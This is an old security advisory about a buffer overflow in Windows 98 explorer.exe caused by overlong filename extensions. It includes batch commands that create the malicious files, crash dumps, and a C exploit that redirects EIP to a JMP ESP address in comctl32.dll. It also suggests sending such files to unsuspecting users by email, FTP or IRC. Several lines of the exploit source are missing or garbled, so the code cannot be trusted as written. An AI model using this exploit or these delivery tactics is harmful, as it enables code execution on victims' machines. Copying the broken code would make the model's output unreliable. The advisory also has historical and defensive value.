kernel (explorer.exe)


    MS Windows '95/'98/SE


    Following is based on Securax Security Advisory.  It is not  known
    what causes explorer  to crash.   It is suspected  to be a  buffer
    overflow  in  explorer.exe  but  in  some cases it's noticed other
    programs (that do not use explorer.exe) crash too.

    When  the  Microsoft  Windows  explorer  tries to access parsing a
    filename that contains >129 chars in the extension, a buffer  will
    overflow.  And you will get this error:

        EXPLORER caused an invalid page fault in
        module <unknown> at 0000:61616161.
        EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
        EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
        ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
        EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
        Bytes at CS:EIP:

        Stack dump:
        61616161 61616161 61616161 61616161 61616161 61616161 61616161
        61616161 61616161 61616161 61616161 61616161 61616161 61616161
        61616161 61616161

    As you can notice, the  EIP was overwritten during this  overflow,
    this means we can execute code  from in the filename.  We  can use
    247 + 129 + 118 bytes to store data for some shell code.

    If you  add some  extra special  characters to  the file,  you can
    cause it to be recognized as write only in windows (and not  found
    in dos).  That way, you will  not be able to remove it unless  you
    write direct to the fat.   This would make viruses invincible  for

    Reproduction of the problem
    For creating such a file place the following code in a .bat file:

        echo This will create a file that when clicked upon in windows
        echo explorer or any other program that calls explorer.exe for
        echo file management will cause a buffer overflow.

        dir *.* > _ . ------Bufferoverflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

        echo This will cause a Blue screen of death
        echo Just to show you it is possible to execute remote code.
        echo (all it does is overwrite the return adress with a false one.)

        dir *.* > _ . ------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1234567890AAAAAAAAAA


        ECHO Buffer overflow in windows98 explorer.exe
        dir *.* > a.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
        ECHO you can vary the amount of a's between 129 and 147 +/-.
        ECHO try to vary this length, it will change results

    Now run the .bat file.

    How about  using this  bug on  remote computers  (tested on Eudora
    Pro).   You  could  attach  the  file  to  an e-mail and send this
    e-mail to an unsuspected computer user.  When he checks his e-mail
    an the mail program attempts to save the attachement to disk,  the
    program will crash cause due to a buffer overflow:

        EUDORA caused an invalid page fault in
        module EUDORA.EXE at 0187:00428b05.
        EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
        EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
        ECX=006a305c DS=018f ESI=007f07a8 FS=582f
        EDX=007eff8c ES=018f EDI=8173b024 GS=0000
        Bytes at CS:EIP:
        56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
        Stack dump:

    Funny  note:  every  time  you  try  to  access  the dir where the
    attachement  should  have  been  saved,  your  program will crash,
    even  if  this  program  is  not  using  explorer  for  it's  file
    management. (In  this case  you don't  even have  to click  on the
    file  or  move  over  it  and  wait  some  time,  it  will   crash
    immediately, rendering the entire directory useless.  This is what
    we get in Windows Commander while trying to browse the  directory.
    Note: the file doesn't show up in a listing, nevertheless, windows
    commander crashes with:

        Application Error
        Exception EAccessViolation in module WINCMD32.EXE at 7F8B0736
        Access violation at address 7FCB1946. Read of address 00580939

    Scanning this dir with scandisk does not report any problems.

    We can upload a file with this name to an FTP server, or place  it
    some HTTP server available for download, DCC Sends on IRC...

    This  type  of  attack  will  allow  any user local or remote with
    file  creation  access  to  run  hostile  code  on  the  computer.
    (Since  e-mail  programs  will  attempt  to  write to disk, almost
    any  windows98  user  with  an  e-mail  adress is vulnerable).  If
    someone writes  some tiny  code that  will download  and execute a
    remote trojan,  this could  cause a  huge problem!   This could be
    used to gain root access  to all windows computers.   Just imagine
    what harm someone could cause if he sends out an e-mail to  10.000
    persons containing code to DDoS some server?

    Writing such a code  might be tricky, coz  we are handling with  a
    filename, and not all hex codes are accepted as a legal  filename.
    (this could  be partially  circumvented by  creating the  filename
    with a raw write to disk).  Everything stated about the  executing
    of code is purely hypothetical.

    Laurent  Eschenauer  added  following.   He  managed  to  write an
    exploit for the nasty filename extension buffer overflow.  If  you
    put more  bytes in  the extensions  than in  the batch proposed by
    Zoa Chien (see above) you  can overflow such that ESP  is actually
    pointing  to  your  shellcode.   If  you  don't fill in the buffer
    enough you need to go upward  in the stack to find a  reference to
    the  extension...   -  Does  that  means   we  have two differents
    buffer overflows?

    Since we have ESP pointing to our code, we just have to find a JMP
    ESP somewhere Laurent used one in comctl32.dll, but he's not  sure
    if this one is static in all win98 release.

    Anyway, he putted  an "int 3"  as code to  exec to show  that it's
    possible to use this baby.  Anyway, it's going to be really tricky
    to do  more since  we have  only a  few bytes  of code  (after the
    smashed EIP at the end of  the extension).  One last thing,  since
    we  have  to  create  a  file  with  our  exploit  as filename, we
    encounters many "bad bytes"  because you can't use  everything you
    want for a filename.

    You'll find  more technical  details in  the code,  where are  the
    bytes that overwrite the eip, where should be the code, etc...

    // Long filename extension exploit for Win 98
    // Written by Laurent Eschenauer <>
    // This exploit is a follow up to Securax advisory posted on Vuln-dev scx-sa-02 by <>
    // I tested it with explorer.exe 4.72.3110.1
    // In the sploit, i use a JMP ESP (FF E4) in comctl32.dll version 5.81
    // I just stuffed an "int 3" in the shellcode, doing more is going to be tricky since
    // we have a limited number of bytes for the code (about 50) and you have a lot of bad bytes
    // since it has to be a filename....
    // Have fun playing with this,
    // If you do anything usefull with this one, please send me a copy and share it on vuln-dev (
    // laurent. [kooka]

    #include <stdio.h>

    #define PATH "d:\\exploit" //Don't forget to change this
                               //put the exploit in a dir so it's easy to
                               //delete it !

    main(int argc, char *argv[])
	    char command[1024];
	    char exploit[256];

	    FILE *hack;
	    int i;

	    // let's fill the sploit !

        char flag = 'a';
	    char fill = 'A';

	    for (i=0;i<240;i+=4) //A little trick to easily find what is where in memory.

		    if (++flag=='z')


	    exploit[240]=0x00; //240 bytes is the max, at least on my config.

	    //EAX - We control it, but who cares ?
	    exploit[127]=(char) 0x50;
	    exploit[128]=(char) 0x50;
	    exploit[129]=(char) 0x50;
	    exploit[130]=(char) 0x50;

	    //EBP Nothing cool to do with this one ?
	    exploit[135]=(char) 0x60;
	    exploit[136]=(char) 0x60;
	    exploit[137]=(char) 0x60;
	    exploit[138]=(char) 0x60;

	    //EIP I use a JMP ESP in comctl32.dll

	    exploit[139]=(char) 0x77;
	    exploit[140]=(char) 0xAD;
	    exploit[141]=(char) 0xB9;
	    exploit[142]=(char) 0xBF;

	    //Shellcode I didn't try anyhting in progress

	    exploit[163]=(char) 0xCC;
	    exploit[164]=(char) 0xCC;
	    exploit[165]=(char) 0xCC;

	    // Let's do it !


	    if (hack==NULL)
		    printf("Error creating file, sorry !\n");
		    // Cool, just click the file and you'll smash the stack !

    Domino and Notes servers running  on NT boxes after receiving  the
    message  with  the  attachment named 1._AAAAAAAAAAAAAAA...........
    will five minutes later hang up.

    Seems like win95 B (4.00.950B) is clean while .....


    Contrary to popular  belief, Windows 98  without IE fixes  much of
    the  OS.    Most  noted  is   the  unending  slew   of  bugs   and
    vulnerabilities that IE and Outlook  bring to the OS.   You should
    use a utility called 98Lite that can be found at

    and have  systems that  outperform and  are more  secure than  any
    Win98 systems setup as Microsoft would have you believe they  need
    to be.